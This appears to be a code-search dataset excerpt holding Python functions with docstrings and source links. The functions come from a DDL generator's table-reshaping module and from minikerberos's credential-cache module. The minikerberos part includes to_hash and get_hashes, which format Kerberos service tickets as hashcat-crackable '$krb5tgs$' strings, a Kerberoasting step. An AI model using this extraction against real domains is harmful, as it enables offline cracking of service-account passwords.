return len([1 for r in self if r.get(value)]) == len(self)
def __init__(self, data, singular_name, pk_name=None, force_pk=False):
self.name = singular_name
super(ParentTable, self).__init__(data)
self.pk_name = pk_name
if force_pk or (self.pk_name and self.is_in_all_rows(self.pk_name)):
self.assign_pk()
else:
self.pk = None
def suitability_as_key(self, key_name):
"""
Returns: (result, key_type)
``result`` is True, False, or 'absent' or 'partial' (both still usable)
``key_type`` is ``int`` for integer keys or ``str`` for hash keys
"""
pk_values = all_values_for(self, key_name)
if not pk_values:
return ('absent', int) # could still use it
key_type = type(th.best_coercable(pk_values))
num_unique_values = len(set(pk_values))
if num_unique_values < len(pk_values):
return (False, None) # non-unique
if num_unique_values == len(self):
return (True, key_type) # perfect!
return ('partial', key_type) # unique, but some rows need populating
def use_this_pk(self, pk_name, key_type):
if key_type == int:
self.pk = UniqueKey(pk_name, key_type, max([0, ] + all_values_for(self, pk_name)))
else:
self.pk = UniqueKey(pk_name, key_type)
def assign_pk(self):
"""
"""
if not self.pk_name:
self.pk_name = '%s_id' % self.name
logging.warning('Primary key %s.%s not requested, but nesting demands it'
% (self.name, self.pk_name))
(suitability, key_type) = self.suitability_as_key(self.pk_name)
if not suitability:
raise Exception('Duplicate values in %s.%s, unsuitable primary key'
% (self.name, self.pk_name))
self.use_this_pk(self.pk_name, key_type)
if suitability in ('absent', 'partial'):
for row in self:
if self.pk_name not in row:
row[self.pk_name] = self.pk.next()
def unnest_children(data, parent_name='', pk_name=None, force_pk=False):
"""
For each ``key`` in each row of ``data`` (which must be a list of dicts),
unnest any dict values into ``parent``, and remove list values into separate lists.
Return (``data``, ``pk_name``, ``children``, ``child_fk_names``) where
``data``
the transformed input list
``pk_name``
field name of ``data``'s (possibly new) primary key
``children``
a defaultdict(list) of data extracted from child lists
``child_fk_names``
dict of the foreign key field name in each child
"""
possible_fk_names = ['%s_id' % parent_name, '_%s_id' % parent_name, 'parent_id', ]
if pk_name:
possible_fk_names.insert(0, '%s_%s' % (parent_name, pk_name.strip('_')))
children = defaultdict(list)
field_names_used_by_children = defaultdict(set)
child_fk_names = {}
parent = ParentTable(data, parent_name, pk_name=pk_name, force_pk=force_pk)
for row in parent:
try:
for (key, val) in row.items():
if hasattr(val, 'items'):
unnest_child_dict(parent=row, key=key, parent_name=parent_name)
elif isinstance(val, list) or isinstance(val, tuple):
# force listed items to be dicts, not scalars
row[key] = [v if hasattr(v, 'items') else {key: v} for v in val]
except AttributeError:
raise TypeError('Each row should be a dictionary, got %s: %s' % (type(row), row))
for (key, val) in row.items():
if isinstance(val, list) or isinstance(val, tuple):
for child in val:
field_names_used_by_children[key].update(set(child.keys()))
for (child_name, names_in_use) in field_names_used_by_children.items():
if not parent.pk:
parent.assign_pk()
for fk_name in possible_fk_names:
if fk_name not in names_in_use:
break
else:
raise Exception("Cannot find unused field name in %s.%s to use as foreign key"
% (parent_name, child_name))
child_fk_names[child_name] = fk_name
for row in parent:
if child_name in row:
for child in row[child_name]:
child[fk_name] = row[parent.pk.name]
children[child_name].append(child)
row.pop(child_name)
# TODO: What if rows have a mix of scalar / list / dict types?
return (parent, parent.pk.name if parent.pk else None, children, child_fk_names)
if __name__ == '__main__':
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
catherinedevlin/ddl-generator | ddlgenerator/reshape.py | unnest_children | python | def unnest_children(data, parent_name='', pk_name=None, force_pk=False):
possible_fk_names = ['%s_id' % parent_name, '_%s_id' % parent_name, 'parent_id', ]
if pk_name:
possible_fk_names.insert(0, '%s_%s' % (parent_name, pk_name.strip('_')))
children = defaultdict(list)
field_names_used_by_children = defaultdict(set)
child_fk_names = {}
parent = ParentTable(data, parent_name, pk_name=pk_name, force_pk=force_pk)
for row in parent:
try:
for (key, val) in row.items():
if hasattr(val, 'items'):
unnest_child_dict(parent=row, key=key, parent_name=parent_name)
elif isinstance(val, list) or isinstance(val, tuple):
# force listed items to be dicts, not scalars
row[key] = [v if hasattr(v, 'items') else {key: v} for v in val]
except AttributeError:
raise TypeError('Each row should be a dictionary, got %s: %s' % (type(row), row))
for (key, val) in row.items():
if isinstance(val, list) or isinstance(val, tuple):
for child in val:
field_names_used_by_children[key].update(set(child.keys()))
for (child_name, names_in_use) in field_names_used_by_children.items():
if not parent.pk:
parent.assign_pk()
for fk_name in possible_fk_names:
if fk_name not in names_in_use:
break
else:
raise Exception("Cannot find unused field name in %s.%s to use as foreign key"
% (parent_name, child_name))
child_fk_names[child_name] = fk_name
for row in parent:
if child_name in row:
for child in row[child_name]:
child[fk_name] = row[parent.pk.name]
children[child_name].append(child)
row.pop(child_name)
# TODO: What if rows have a mix of scalar / list / dict types?
return (parent, parent.pk.name if parent.pk else None, children, child_fk_names) | For each ``key`` in each row of ``data`` (which must be a list of dicts),
unnest any dict values into ``parent``, and remove list values into separate lists.
Return (``data``, ``pk_name``, ``children``, ``child_fk_names``) where
``data``
the transformed input list
``pk_name``
field name of ``data``'s (possibly new) primary key
``children``
a defaultdict(list) of data extracted from child lists
``child_fk_names``
dict of the foreign key field name in each child | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/reshape.py#L263-L318 | [
"def unnest_child_dict(parent, key, parent_name=''):\n \"\"\"\n If ``parent`` dictionary has a ``key`` whose ``val`` is a dict,\n unnest ``val``'s fields into ``parent`` and remove ``key``.\n\n >>> parent = {'province': 'Québec', 'capital': {'name': 'Québec City', 'pop': 491140}}\n >>> unnest_child_d... | #!/usr/bin/python
# -*- coding: utf8
import logging
from collections import OrderedDict, namedtuple, defaultdict
import doctest
from hashlib import md5
import hashlib
import copy
from pprint import pprint
from ddlgenerator.reserved import sql_reserved_words
import re
try:
import ddlgenerator.typehelpers as th
except ImportError:
import typehelpers as th # TODO: can py2/3 split this
_illegal_in_column_name = re.compile(r'[^a-zA-Z0-9_$#]')
def clean_key_name(key):
"""
Makes ``key`` a valid and appropriate SQL column name:
1. Replaces illegal characters in column names with ``_``
2. Prevents name from beginning with a digit (prepends ``_``)
3. Lowercases name. If you want case-sensitive table
or column names, you are a bad person and you should feel bad.
"""
result = _illegal_in_column_name.sub("_", key.strip())
if result[0].isdigit():
result = '_%s' % result
if result.upper() in sql_reserved_words:
result = '_%s' % key
return result.lower()
def walk_and_clean(data):
"""
Recursively walks list of dicts (which may themselves embed lists and dicts),
transforming namedtuples to OrderedDicts and
using ``clean_key_name(k)`` to make keys into SQL-safe column names
>>> data = [{'a': 1}, [{'B': 2}, {'B': 3}], {'F': {'G': 4}}]
>>> pprint(walk_and_clean(data))
[OrderedDict([('a', 1)]),
[OrderedDict([('b', 2)]), OrderedDict([('b', 3)])],
OrderedDict([('f', OrderedDict([('g', 4)]))])]
"""
# transform namedtuples to OrderedDicts
if hasattr(data, '_fields'):
data = OrderedDict((k,v) for (k,v) in zip(data._fields, data))
# Recursively clean up child dicts and lists
if hasattr(data, 'items') and hasattr(data, '__setitem__'):
for (key, val) in data.items():
data[key] = walk_and_clean(val)
elif isinstance(data, list) or isinstance(data, tuple) \
or hasattr(data, '__next__') or hasattr(data, 'next'):
data = [walk_and_clean(d) for d in data]
# Clean up any keys in this dict itself
if hasattr(data, 'items'):
original_keys = data.keys()
tup = ((clean_key_name(k), v) for (k, v) in data.items())
data = OrderedDict(tup)
if len(data) < len(original_keys):
raise KeyError('Cleaning up %s created duplicates' %
original_keys)
return data
def _id_fieldname(fieldnames, table_name = ''):
"""
Finds the field name from a dict likeliest to be its unique ID
>>> _id_fieldname({'bar': True, 'id': 1}, 'foo')
'id'
>>> _id_fieldname({'bar': True, 'foo_id': 1, 'goo_id': 2}, 'foo')
'foo_id'
>>> _id_fieldname({'bar': True, 'baz': 1, 'baz_id': 3}, 'foo')
"""
templates = ['%s_%%s' % table_name, '%s', '_%s']
for stub in ['id', 'num', 'no', 'number']:
for t in templates:
if t % stub in fieldnames:
return t % stub
class UniqueKey(object):
"""
Provides unique IDs.
>>> idp1 = UniqueKey('id', int, max=4)
>>> idp1.next()
5
>>> idp1.next()
6
>>> idp2 = UniqueKey('id', str)
>>> id2 = idp2.next()
>>> (len(id2), type(id2))
(32, <class 'str'>)
"""
def __init__(self, key_name, key_type, max=0):
self.name = key_name
if key_type != int and not hasattr(key_type, 'lower'):
raise NotImplementedError("Primary key field %s is %s, must be string or integer"
% (key_name, key_type))
self.type = key_type
self.max = max
def next(self):
if self.type == int:
self.max += 1
return self.max
else:
return md5().hexdigest()
def unnest_child_dict(parent, key, parent_name=''):
"""
If ``parent`` dictionary has a ``key`` whose ``val`` is a dict,
unnest ``val``'s fields into ``parent`` and remove ``key``.
>>> parent = {'province': 'Québec', 'capital': {'name': 'Québec City', 'pop': 491140}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital_name': 'Québec City', 'capital_pop': 491140, 'province': 'Québec'}
>>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City', 'pop': 491140}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital_id': 1,
'capital_name': 'Québec City',
'capital_pop': 491140,
'province': 'Québec'}
>>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City'}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital': 'Québec City', 'province': 'Québec'}
"""
val = parent[key]
name = "%s['%s']" % (parent_name, key)
logging.debug("Unnesting dict %s" % name)
id = _id_fieldname(val, parent_name)
if id:
logging.debug("%s is %s's ID" % (id, key))
if len(val) <= 2:
logging.debug('Removing ID column %s.%s' % (key, id))
val.pop(id)
if len(val) == 0:
logging.debug('%s is empty, removing from %s' % (name, parent_name))
parent.pop(key)
return
elif len(val) == 1:
logging.debug('Nested one-item dict in %s, making scalar.' % name)
parent[key] = list(val.values())[0]
return
else:
logging.debug('Pushing all fields from %s up to %s' % (name, parent_name))
new_field_names = ['%s_%s' % (key, child_key.strip('_')) for child_key in val]
overlap = (set(new_field_names) & set(parent)) - set(id or [])
if overlap:
logging.error("Could not unnest child %s; %s present in %s"
% (name, key, ','.join(overlap), parent_name))
return
for (child_key, child_val) in val.items():
new_field_name = '%s_%s' % (key, child_key.strip('_'))
parent[new_field_name] = child_val
parent.pop(key)
_sample_data = [{'province': 'Québec', 'capital': {'name': 'Québec City', 'pop': 491140},
'id': 1, 'province_id': 1,
'cities': [{'name': 'Montreal', 'pop': 1649519}, {'name': 'Laval', 'pop': 401553}]},
{'province': 'Ontario', 'capital': {'name': 'Toronto', 'pop': 2615060}, 'province_id': 2,
'cities': [{'name': 'Ottawa', 'pop': 883391}, {'name': 'Missisauga', 'pop': 713443}]},
{'province': 'New Brunswick', 'capital': {'name': 'Fredricton', 'pop': 56224},
'id': 3, 'province_id': 3,
'cities': [{'name': 'Saint John', 'pop': 70063}, {'name': 'Moncton', 'pop': 69074}]},
]
def all_values_for(data, field_name):
return [row.get(field_name) for row in data if field_name in row]
def unused_field_name(data, preferences):
for pref in preferences:
if not all_values_for(data, pref):
return pref
raise KeyError("All desired names already taken in %s" % self.name)
class ParentTable(list):
"""
List of ``dict``s that knows (or creates) its own primary key field.
>>> provinces = ParentTable(_sample_data, 'province', pk_name='province_id')
>>> provinces.pk.name
'province_id'
>>> [p[provinces.pk.name] for p in provinces]
[1, 2, 3]
>>> provinces.pk.max
3
Now if province_id is unusable because it's nonunique:
>>> data2 = copy.deepcopy(_sample_data)
>>> for row in data2: row['province_id'] = 4
>>> provinces2 = ParentTable(data2, 'province', pk_name='id', force_pk=True)
>>> provinces2.pk.name
'id'
>>> [p[provinces2.pk.name] for p in provinces2]
[1, 4, 3]
"""
def is_in_all_rows(self, value):
return len([1 for r in self if r.get(value)]) == len(self)
def __init__(self, data, singular_name, pk_name=None, force_pk=False):
self.name = singular_name
super(ParentTable, self).__init__(data)
self.pk_name = pk_name
if force_pk or (self.pk_name and self.is_in_all_rows(self.pk_name)):
self.assign_pk()
else:
self.pk = None
def suitability_as_key(self, key_name):
"""
Returns: (result, key_type)
``result`` is True, False, or 'absent' or 'partial' (both still usable)
``key_type`` is ``int`` for integer keys or ``str`` for hash keys
"""
pk_values = all_values_for(self, key_name)
if not pk_values:
return ('absent', int) # could still use it
key_type = type(th.best_coercable(pk_values))
num_unique_values = len(set(pk_values))
if num_unique_values < len(pk_values):
return (False, None) # non-unique
if num_unique_values == len(self):
return (True, key_type) # perfect!
return ('partial', key_type) # unique, but some rows need populating
def use_this_pk(self, pk_name, key_type):
if key_type == int:
self.pk = UniqueKey(pk_name, key_type, max([0, ] + all_values_for(self, pk_name)))
else:
self.pk = UniqueKey(pk_name, key_type)
def assign_pk(self):
"""
"""
if not self.pk_name:
self.pk_name = '%s_id' % self.name
logging.warning('Primary key %s.%s not requested, but nesting demands it'
% (self.name, self.pk_name))
(suitability, key_type) = self.suitability_as_key(self.pk_name)
if not suitability:
raise Exception('Duplicate values in %s.%s, unsuitable primary key'
% (self.name, self.pk_name))
self.use_this_pk(self.pk_name, key_type)
if suitability in ('absent', 'partial'):
for row in self:
if self.pk_name not in row:
row[self.pk_name] = self.pk.next()
if __name__ == '__main__':
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
catherinedevlin/ddl-generator | ddlgenerator/reshape.py | ParentTable.suitability_as_key | python | def suitability_as_key(self, key_name):
pk_values = all_values_for(self, key_name)
if not pk_values:
return ('absent', int) # could still use it
key_type = type(th.best_coercable(pk_values))
num_unique_values = len(set(pk_values))
if num_unique_values < len(pk_values):
return (False, None) # non-unique
if num_unique_values == len(self):
return (True, key_type) # perfect!
return ('partial', key_type) | Returns: (result, key_type)
``result`` is True, False, or 'absent' or 'partial' (both still usable)
``key_type`` is ``int`` for integer keys or ``str`` for hash keys | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/reshape.py#L220-L236 | [
"def all_values_for(data, field_name):\n return [row.get(field_name) for row in data if field_name in row]\n",
"def best_coercable(data):\n \"\"\"\n Given an iterable of scalar data, returns the datum representing the most specific\n data type the list overall can be coerced into, preferring datetimes... | class ParentTable(list):
"""
List of ``dict``s that knows (or creates) its own primary key field.
>>> provinces = ParentTable(_sample_data, 'province', pk_name='province_id')
>>> provinces.pk.name
'province_id'
>>> [p[provinces.pk.name] for p in provinces]
[1, 2, 3]
>>> provinces.pk.max
3
Now if province_id is unusable because it's nonunique:
>>> data2 = copy.deepcopy(_sample_data)
>>> for row in data2: row['province_id'] = 4
>>> provinces2 = ParentTable(data2, 'province', pk_name='id', force_pk=True)
>>> provinces2.pk.name
'id'
>>> [p[provinces2.pk.name] for p in provinces2]
[1, 4, 3]
"""
def is_in_all_rows(self, value):
return len([1 for r in self if r.get(value)]) == len(self)
def __init__(self, data, singular_name, pk_name=None, force_pk=False):
self.name = singular_name
super(ParentTable, self).__init__(data)
self.pk_name = pk_name
if force_pk or (self.pk_name and self.is_in_all_rows(self.pk_name)):
self.assign_pk()
else:
self.pk = None
# unique, but some rows need populating
def use_this_pk(self, pk_name, key_type):
if key_type == int:
self.pk = UniqueKey(pk_name, key_type, max([0, ] + all_values_for(self, pk_name)))
else:
self.pk = UniqueKey(pk_name, key_type)
def assign_pk(self):
"""
"""
if not self.pk_name:
self.pk_name = '%s_id' % self.name
logging.warning('Primary key %s.%s not requested, but nesting demands it'
% (self.name, self.pk_name))
(suitability, key_type) = self.suitability_as_key(self.pk_name)
if not suitability:
raise Exception('Duplicate values in %s.%s, unsuitable primary key'
% (self.name, self.pk_name))
self.use_this_pk(self.pk_name, key_type)
if suitability in ('absent', 'partial'):
for row in self:
if self.pk_name not in row:
row[self.pk_name] = self.pk.next()
|
skelsec/minikerberos | minikerberos/ccache.py | Header.parse | python | def parse(data):
reader = io.BytesIO(data)
headers = []
while reader.tell() < len(data):
h = Header()
h.tag = int.from_bytes(reader.read(2), byteorder='big', signed=False)
h.taglen = int.from_bytes(reader.read(2), byteorder='big', signed=False)
h.tagdata = reader.read(h.taglen)
headers.append(h)
return headers | returns a list of header tags | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L29-L41 | null | class Header:
def __init__(self):
self.tag = None
self.taglen = None
self.tagdata = None
@staticmethod
def to_bytes(self):
t = self.tag.to_bytes(2, byteorder='big', signed=False)
t += len(self.tagdata).to_bytes(2, byteorder='big', signed=False)
t += self.tagdata
return t
def __str__(self):
t = 'tag: %s\n' % self.tag
t += 'taglen: %s\n' % self.taglen
t += 'tagdata: %s\n' % self.tagdata
return t
|
skelsec/minikerberos | minikerberos/ccache.py | Credential.to_tgt | python | def to_tgt(self):
enc_part = EncryptedData({'etype': 1, 'cipher': b''})
tgt_rep = {}
tgt_rep['pvno'] = krb5_pvno
tgt_rep['msg-type'] = MESSAGE_TYPE.KRB_AS_REP.value
tgt_rep['crealm'] = self.server.realm.to_string()
tgt_rep['cname'] = self.client.to_asn1()[0]
tgt_rep['ticket'] = Ticket.load(self.ticket.to_asn1()).native
tgt_rep['enc-part'] = enc_part.native
t = EncryptionKey(self.key.to_asn1()).native
return tgt_rep, t | Returns the native format of an AS_REP message and the sessionkey in EncryptionKey native format | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L102-L118 | null | class Credential:
def __init__(self):
self.client = None
self.server = None
self.key = None
self.time = None
self.is_skey = None
self.tktflags = None
self.num_address = None
self.addrs = []
self.num_authdata = None
self.authdata = []
self.ticket = None
self.second_ticket = None
def to_hash(self):
res = Ticket.load(self.ticket.to_asn1()).native
tgs_encryption_type = int(res['enc-part']['etype'])
t = len(res['sname']['name-string'])
if t == 1:
tgs_name_string = res['sname']['name-string'][0]
else:
tgs_name_string = res['sname']['name-string'][1]
tgs_realm = res['realm']
tgs_checksum = res['enc-part']['cipher'][:16]
tgs_encrypted_data2 = res['enc-part']['cipher'][16:]
return '$krb5tgs$%s$*%s$%s$spn*$%s$%s' % (tgs_encryption_type,tgs_name_string,tgs_realm, tgs_checksum.hex(), tgs_encrypted_data2.hex() )
def to_tgt(self):
"""
Returns the native format of an AS_REP message and the sessionkey in EncryptionKey native format
"""
enc_part = EncryptedData({'etype': 1, 'cipher': b''})
tgt_rep = {}
tgt_rep['pvno'] = krb5_pvno
tgt_rep['msg-type'] = MESSAGE_TYPE.KRB_AS_REP.value
tgt_rep['crealm'] = self.server.realm.to_string()
tgt_rep['cname'] = self.client.to_asn1()[0]
tgt_rep['ticket'] = Ticket.load(self.ticket.to_asn1()).native
tgt_rep['enc-part'] = enc_part.native
t = EncryptionKey(self.key.to_asn1()).native
return tgt_rep, t
def to_kirbi(self):
filename = '%s@%s_%s' % (self.client.to_string() , self.server.to_string(), hashlib.sha1(self.ticket.to_asn1()).hexdigest()[:8])
krbcredinfo = {}
krbcredinfo['key'] = EncryptionKey(self.key.to_asn1())
krbcredinfo['prealm'] = self.client.realm.to_string()
krbcredinfo['pname'] = self.client.to_asn1()[0]
krbcredinfo['flags'] = core.IntegerBitString(self.tktflags).cast(TicketFlags)
if self.time.authtime != 0: #this parameter is not mandatory, and most of the time not present
krbcredinfo['authtime'] = datetime.datetime.fromtimestamp(self.time.authtime)
krbcredinfo['starttime'] = datetime.datetime.fromtimestamp(self.time.starttime)
krbcredinfo['endtime'] = datetime.datetime.fromtimestamp(self.time.endtime)
if self.time.renew_till != 0: #this parameter is not mandatory, and sometimes it's not present
krbcredinfo['renew-till'] = datetime.datetime.fromtimestamp(self.time.authtime)
krbcredinfo['srealm'] = self.server.realm.to_string()
krbcredinfo['sname'] = self.server.to_asn1()[0]
enc_krbcred = {}
enc_krbcred['ticket-info'] = [KrbCredInfo(krbcredinfo)]
krbcred = {}
krbcred['pvno'] = krb5_pvno
krbcred['msg-type'] = MESSAGE_TYPE.KRB_CRED.value
krbcred['tickets'] = [Ticket.load(self.ticket.to_asn1())]
krbcred['enc-part'] = EncryptedData({'etype': EncryptionType.NULL.value, 'cipher': EncKrbCredPart(enc_krbcred).dump()})
kirbi = KRBCRED(krbcred)
return kirbi, filename
def from_asn1(ticket, data):
###
# data = KrbCredInfo
###
c = Credential()
c.client = CCACHEPrincipal.from_asn1(data['pname'], data['prealm'])
c.server = CCACHEPrincipal.from_asn1(data['sname'], data['srealm'])
c.key = Keyblock.from_asn1(data['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(data['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(ticket['enc-part']['cipher'])
c.second_ticket = CCACHEOctetString.empty()
return c
def parse(reader):
c = Credential()
c.client = CCACHEPrincipal.parse(reader)
c.server = CCACHEPrincipal.parse(reader)
c.key = Keyblock.parse(reader)
c.time = Times.parse(reader)
c.is_skey = int.from_bytes(reader.read(1), byteorder='big', signed=False)
c.tktflags = int.from_bytes(reader.read(4), byteorder='little', signed=False)
c.num_address = int.from_bytes(reader.read(4), byteorder='big', signed=False)
for i in range(c.num_address):
c.addrs.append(Address.parse(reader))
c.num_authdata = int.from_bytes(reader.read(4), byteorder='big', signed=False)
for i in range(c.num_authdata):
c.authdata.append(Authdata.parse(reader))
c.ticket = CCACHEOctetString.parse(reader)
c.second_ticket = CCACHEOctetString.parse(reader)
return c
def summary_header():
return ['client','server','starttime','endtime','renew-till']
def summary(self):
return [
'%s@%s' % (self.client.to_string(),self.client.realm.to_string()),
'%s@%s' % (self.server.to_string(), self.server.realm.to_string()),
datetime.datetime.fromtimestamp(self.time.starttime).isoformat() if self.time.starttime != 0 else 'N/A',
datetime.datetime.fromtimestamp(self.time.endtime).isoformat() if self.time.endtime != 0 else 'N/A',
datetime.datetime.fromtimestamp(self.time.renew_till).isoformat() if self.time.renew_till != 0 else 'N/A',
]
def to_bytes(self):
t = self.client.to_bytes()
t += self.server.to_bytes()
t += self.key.to_bytes()
t += self.time.to_bytes()
t += self.is_skey.to_bytes(1, byteorder='big', signed=False)
t += self.tktflags.to_bytes(4, byteorder='little', signed=False)
t += self.num_address.to_bytes(4, byteorder='big', signed=False)
for addr in self.addrs:
t += addr.to_bytes()
t += self.num_authdata.to_bytes(4, byteorder='big', signed=False)
for ad in self.authdata:
t += ad.to_bytes()
t += self.ticket.to_bytes()
t += self.second_ticket.to_bytes()
return t
|
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.add_tgt | python | def add_tgt(self, as_rep, enc_as_rep_part, override_pp = True): #from AS_REP
c = Credential()
c.client = CCACHEPrincipal.from_asn1(as_rep['cname'], as_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_as_rep_part['sname'], enc_as_rep_part['srealm'])
c.time = Times.from_asn1(enc_as_rep_part)
c.key = Keyblock.from_asn1(enc_as_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_as_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(as_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c) | Creates credential object from the TGT and adds to the ccache file
The TGT is basically the native representation of the asn1 encoded AS_REP data that the AD sends upon a succsessful TGT request.
This function doesn't do decryption of the encrypted part of the as_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L465-L489 | [
"def from_asn1(data):\n\tk = Keyblock()\n\tk.keytype = data['keytype']\n\tk.etype = 0 # not sure\n\tk.keylen = len(data['keyvalue'])\n\tk.keyvalue = data['keyvalue']\n\n\treturn k\n",
"def from_asn1(enc_as_rep_part):\n\tt = Times()\n\tif 'authtime' in enc_as_rep_part and enc_as_rep_part['authtime']:\n\t\tt.authti... | class CCACHE:
"""
As the header is rarely used -mostly static- you'd need to init this object with empty = True to get an object without header already present
"""
def __init__(self, empty = False):
self.file_format_version = None #0x0504
self.headers = []
self.primary_principal = None
self.credentials = []
if empty == False:
self.__setup()
def __setup(self):
self.file_format_version = 0x0504
header = Header()
header.tag = 1
header.taglen = 8
#header.tagdata = b'\xff\xff\xff\xff\x00\x00\x00\x00'
header.tagdata = b'\x00\x00\x00\x00\x00\x00\x00\x00'
self.headers.append(header)
#t_hdr = b''
#for header in self.headers:
# t_hdr += header.to_bytes()
#self.headerlen = 1 #size of the entire header in bytes, encoded in 2 byte big-endian unsigned int
self.primary_principal = CCACHEPrincipal.dummy()
def __str__(self):
t = '== CCACHE ==\n'
t+= 'file_format_version : %s\n' % self.file_format_version
for header in self.headers:
t+= '%s\n' % header
t+= 'primary_principal : %s\n' % self.primary_principal
return t
def add_tgt(self, as_rep, enc_as_rep_part, override_pp = True): #from AS_REP
"""
Creates credential object from the TGT and adds to the ccache file
The TGT is basically the native representation of the asn1 encoded AS_REP data that the AD sends upon a succsessful TGT request.
This function doesn't do decryption of the encrypted part of the as_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(as_rep['cname'], as_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_as_rep_part['sname'], enc_as_rep_part['srealm'])
c.time = Times.from_asn1(enc_as_rep_part)
c.key = Keyblock.from_asn1(enc_as_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_as_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(as_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_tgs(self, tgs_rep, enc_tgs_rep_part, override_pp = False): #from AS_REP
"""
Creates credential object from the TGS and adds to the ccache file
The TGS is the native representation of the asn1 encoded TGS_REP data when the user requests a tgs to a specific service principal with a valid TGT
This function doesn't do decryption of the encrypted part of the tgs_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(tgs_rep['cname'], tgs_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_tgs_rep_part['sname'], enc_tgs_rep_part['srealm'])
c.time = Times.from_asn1(enc_tgs_rep_part)
c.key = Keyblock.from_asn1(enc_tgs_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_tgs_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(tgs_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_kirbi(self, krbcred, override_pp = True, include_expired = False):
c = Credential()
enc_credinfo = EncKrbCredPart.load(krbcred['enc-part']['cipher']).native
ticket_info = enc_credinfo['ticket-info'][0]
"""
if ticket_info['endtime'] < datetime.datetime.now(datetime.timezone.utc):
if include_expired == True:
logging.debug('This ticket has most likely expired, but include_expired is forcing me to add it to cache! This can cause problems!')
else:
logging.debug('This ticket has most likely expired, skipping')
return
"""
c.client = CCACHEPrincipal.from_asn1(ticket_info['pname'], ticket_info['prealm'])
if override_pp == True:
self.primary_principal = c.client
#yaaaaay 4 additional weirdness!!!!
#if sname name-string contains a realm as well htne impacket will crash miserably :(
if len(ticket_info['sname']['name-string']) > 2 and ticket_info['sname']['name-string'][-1].upper() == ticket_info['srealm'].upper():
logging.debug('SNAME contains the realm as well, trimming it')
t = ticket_info['sname']
t['name-string'] = t['name-string'][:-1]
c.server = CCACHEPrincipal.from_asn1(t, ticket_info['srealm'])
else:
c.server = CCACHEPrincipal.from_asn1(ticket_info['sname'], ticket_info['srealm'])
c.time = Times.from_asn1(ticket_info)
c.key = Keyblock.from_asn1(ticket_info['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(ticket_info['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(krbcred['tickets'][0]).dump()) #kirbi only stores one ticket per file
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def from_kirbi(kirbidata):
kirbi = KRBCRED.load(kirbidata).native
cc = CCACHE()
cc.add_kirbi(kirbi)
return cc
def get_all_tgt(self):
"""
Returns a list of AS_REP tickets in native format (dict).
To determine which ticket are AP_REP we check for the server principal to be the kerberos service
"""
tgts = []
for cred in self.credentials:
if cred.server.to_string().lower().find('krbtgt') != -1:
tgts.append(cred.to_tgt())
return tgts
def get_hashes(self, all_hashes = False):
"""
Returns a list of hashes in hashcat-firendly format for tickets with encryption type 23 (which is RC4)
all_hashes: overrides the encryption type filtering and returns hash for all tickets
"""
hashes = []
for cred in self.credentials:
res = Ticket.load(cred.ticket.to_asn1()).native
if int(res['enc-part']['etype']) == 23 or all_hashes == True:
hashes.append(cred.to_hash())
return hashes
def parse(reader):
c = CCACHE(True)
c.file_format_version = int.from_bytes(reader.read(2), byteorder='big', signed=False)
hdr_size = int.from_bytes(reader.read(2), byteorder='big', signed=False)
c.headers = Header.parse(reader.read(hdr_size))
#c.headerlen =
#for i in range(c.headerlen):
# c.headers.append(Header.parse(reader))
c.primary_principal = CCACHEPrincipal.parse(reader)
pos = reader.tell()
reader.seek(-1,2)
eof = reader.tell()
reader.seek(pos,0)
while reader.tell() < eof:
c.credentials.append(Credential.parse(reader))
return c
def to_bytes(self):
